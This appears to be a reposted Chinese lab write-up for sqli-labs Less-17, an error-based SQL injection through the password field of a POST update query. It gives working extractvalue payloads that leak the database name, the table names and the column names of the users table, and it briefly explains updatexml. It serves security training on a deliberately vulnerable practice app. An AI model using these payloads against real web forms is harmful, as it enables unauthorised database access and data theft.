[大数据] Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 大数据 -> Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入) -> 正文阅读

[大数据]Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

尝试username 的注入发现无论我们注入什么都没有结果
观察源码以及题目提示发现此关应该是基于password的

在这里插入图片描述
观察源码发现uname进行了check_input

数据增加转义字符“\”，以确保这些数据不会引起数据库错误

可以看到对用户名进行了处理无法注入
所以我们尝试注入密码
在这里插入图片描述
uname=admin&passwd=admin’&submit=Submit

在这里插入图片描述

在这里插入图片描述
尝试报错注入
uname=admin&passwd=1’ and extractvalue(1,concat(0x7e,database()))#
拿到了数据库名

之后拿到了表名
uname=admin&passwd=1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’)))#

在这里插入图片描述
拿到了字段
uname=admin&passwd=1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name = ‘users’)))#

也可以用updataxml进行破解
原理报错注入

updatexml
函数原型：updatexml(xml_document,xpath_string,new_value)
正常语法：updatexml(xml_document,xpath_string,new_value)
第一个参数：xml_document是string格式，为xml文档对象的名称第二个参数：xpath_string是xpath格式的字符串
第三个参数：new_value是string格式，替换查找到的负荷条件的数据作用：改变文档中符合条件的节点的值

大数据最新文章

实现Kafka至少消费一次

亚马逊云科技：还在苦于ETL？Zero ETL的时代

初探MapReduce

【SpringBoot框架篇】32.基于注解+redis实现

Elasticsearch：如何减少 Elasticsearch 集

Go redis操作

Redis面试题

专题五 Redis高并发场景

基于GBase8s和Calcite的多数据源查询

Redis——底层数据结构原理

加:2021-11-16 18:54:27 更:2021-11-16 18:55:59

360图书馆购物三丰科技阅读网日历万年历 2024年11日历

-2024/11/24 5:30:30-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码